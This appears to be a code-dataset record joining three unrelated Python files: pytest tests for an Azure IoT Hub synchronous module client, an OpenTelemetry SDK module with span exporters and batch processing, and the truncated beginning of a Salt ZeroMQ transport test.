uri_format = "{hostname}/devices/{device_id}/modules/{module_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(
hostname=hostname, device_id="nonmatching_device", module_id=module_id
)
elif request.param == "Nonmatching Module ID":
return uri_format.format(
hostname=hostname, device_id=device_id, module_id="nonmatching_module"
)
else:
return uri_format.format(
hostname="nonmatching_hostname", device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=[
"Too short",
"Too long",
"Incorrectly formatted device notation",
"Incorrectly formatted module notation",
"Device URI",
]
)
def invalid_uri(self, request, device_id, module_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have module ID
return "{}/devices/{}/modules".format(hostname, device_id)
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/modules/{}/somethingElse".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}/modules/{}".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted module notation":
# Doesn't have '/modules/'
return "{}/devices/{}/not-modules/{}".format(hostname, device_id, module_id)
else:
# Valid... for a Device... but this is a Module
return "{}/devices/{}/".format(hostname, device_id)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
        # This check exists because the Message class may change its default content
        # type encoding, which would change the size calculation above.
        # A greater-than check is used for Python 2 compatibility; ideally this would
        # be a not-equal check.
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
        ) # patch this so receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # Input Messages will appear disabled
)
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True # Input Messages will appear enabled
)
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox.put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_connection_state_change")
class TestIoTHubModuleClientPROPERTYOnConnectionStateChangeHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_connection_state_change"
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_new_sastoken_required")
class TestIoTHubModuleClientPROPERTYOnNewSastokenRequiredHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_new_sastoken_required"
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: Connect")
class TestIoTHubModuleClientOCCURRENCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: Disconnect")
class TestIoTHubModuleClientOCCURRENCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCEDisconnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: New Sastoken Required")
class TestIoTHubModuleClientOCCURRENCENewSastokenRequired(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCENewSastokenRequired
):
pass
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import logging
import os
import sys
import threading
import typing
from enum import Enum
from typing import Optional
from opentelemetry.configuration import Configuration
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.util import time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILURE = 1
class SpanExporter:
"""Interface for exporting spans.
    Interface to be implemented by services that want to export spans recorded
    in their own format.
    To export data this MUST be registered to the :class:`opentelemetry.sdk.trace.Tracer` using a
    `SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if not span.context.trace_flags.sampled:
return
token = attach(set_value("suppress_instrumentation", True))
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
detach(token)
def shutdown(self) -> None:
self.span_exporter.shutdown()
def force_flush(self, timeout_millis: int = 30000) -> bool:
# pylint: disable=unused-argument
return True
class _FlushRequest:
"""Represents a request for the BatchExportSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchExportSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
BatchExportSpanProcessor is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
"""
def __init__(
self,
span_exporter: SpanExporter,
max_queue_size: int = None,
schedule_delay_millis: float = None,
max_export_batch_size: int = None,
export_timeout_millis: float = None,
):
if max_queue_size is None:
max_queue_size = Configuration().get("BSP_MAX_QUEUE_SIZE", 2048)
if schedule_delay_millis is None:
schedule_delay_millis = Configuration().get(
"BSP_SCHEDULE_DELAY_MILLIS", 5000
)
if max_export_batch_size is None:
max_export_batch_size = Configuration().get(
"BSP_MAX_EXPORT_BATCH_SIZE", 512
)
if export_timeout_millis is None:
export_timeout_millis = Configuration().get(
"BSP_EXPORT_TIMEOUT_MILLIS", 30000
)
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than or equal to max_queue_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self._flush_request = None # type: typing.Optional[_FlushRequest]
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.export_timeout_millis = export_timeout_millis
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
        # preallocated list to send spans to the exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
if not span.context.trace_flags.sampled:
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logger.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_queue_size // 2:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
flush_request = None # type: typing.Optional[_FlushRequest]
while not self.done:
with self.condition:
if self.done:
# done flag may have changed, avoid waiting
break
flush_request = self._get_and_unset_flush_request()
if (
len(self.queue) < self.max_export_batch_size
and flush_request is None
):
self.condition.wait(timeout)
flush_request = self._get_and_unset_flush_request()
if not self.queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
self._notify_flush_request_finished(flush_request)
flush_request = None
continue
if self.done:
# missing spans will be sent when calling flush
break
            # subtract the duration of this export call from the next timeout
start = time_ns()
self._export(flush_request)
end = time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
self._notify_flush_request_finished(flush_request)
flush_request = None
# there might have been a new flush request while export was running
# and before the done flag switched to true
with self.condition:
shutdown_flush_request = self._get_and_unset_flush_request()
# be sure that all spans are sent
self._drain_queue()
self._notify_flush_request_finished(flush_request)
self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
flush_request: typing.Optional[_FlushRequest],
):
"""Notifies the flush initiator(s) waiting on the given request/event
that the flush operation was finished.
"""
if flush_request is not None:
flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
"""Either returns the current active flush event or creates a new one.
The flush event will be visible and read by the worker thread before an
export operation starts. Callers of a flush operation may wait on the
returned event to be notified when the flush/export operation was
finished.
This method is not thread-safe, i.e. callers need to take care about
synchronization/locking.
"""
if self._flush_request is None:
self._flush_request = _FlushRequest()
return self._flush_request
def _export(self, flush_request: typing.Optional[_FlushRequest]):
"""Exports spans considering the given flush_request.
        In case of a given flush_request, spans are exported in batches until
        the number of exported spans has reached or exceeded the number of
        spans in the flush request.
        If no flush_request was given, at most max_export_batch_size spans are
        exported.
"""
if not flush_request:
self._export_batch()
return
num_spans = flush_request.num_spans
while self.queue:
num_exported = self._export_batch()
num_spans -= num_exported
if num_spans <= 0:
break
def _export_batch(self) -> int:
"""Exports at most max_export_batch_size spans and returns the number of
exported spans.
"""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
token = attach(set_value("suppress_instrumentation", True))
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.spans_list[:idx]) # type: ignore
except Exception: # pylint: disable=broad-except
logger.exception("Exception while exporting Span batch.")
detach(token)
# clean up list
for index in range(idx):
self.spans_list[index] = None
return idx
def _drain_queue(self):
""""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.queue:
self._export_batch()
def force_flush(self, timeout_millis: int = None) -> bool:
if timeout_millis is None:
timeout_millis = self.export_timeout_millis
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
with self.condition:
flush_request = self._get_or_create_flush_request()
# signal the worker thread to flush and wait for it to finish
self.condition.notify_all()
        # wait for the flush request to be processed (or for the timeout to expire)
ret = flush_request.event.wait(timeout_millis / 1e3)
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def __init__(
self,
service_name: Optional[str] = None,
out: typing.IO = sys.stdout,
formatter: typing.Callable[[Span], str] = lambda span: span.to_json()
+ os.linesep,
):
self.out = out
self.formatter = formatter
self.service_name = service_name
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
self.out.write(self.formatter(span))
self.out.flush()
return SpanExportResult.SUCCESS
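# NOTE: Illustrative usage sketch, not part of the original module. It shows
# how the processors/exporters defined above are typically attached to a
# tracer provider. It assumes the companion API/SDK entry points of this SDK
# generation (opentelemetry.trace.set_tracer_provider / get_tracer and
# opentelemetry.sdk.trace.TracerProvider.add_span_processor).
def _example_console_tracing_setup():
    from opentelemetry import trace
    from opentelemetry.sdk.trace import TracerProvider
    provider = TracerProvider()
    # Ended, sampled spans are queued by the batch processor and periodically
    # flushed to stdout via ConsoleSpanExporter.
    provider.add_span_processor(BatchExportSpanProcessor(ConsoleSpanExporter()))
    trace.set_tracer_provider(provider)
    return trace.get_tracer(__name__)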
|
test_zeromq.py
|
# -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
from __future__ import absolute_import, print_function, unicode_literals
import ctypes
import multiprocessing
import os
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
import zmq.eventloop.ioloop
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase
from salt.transport.zeromq import AsyncReqMessageClientPool
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, not_runs_on, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, "ZMQIOLoop"):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
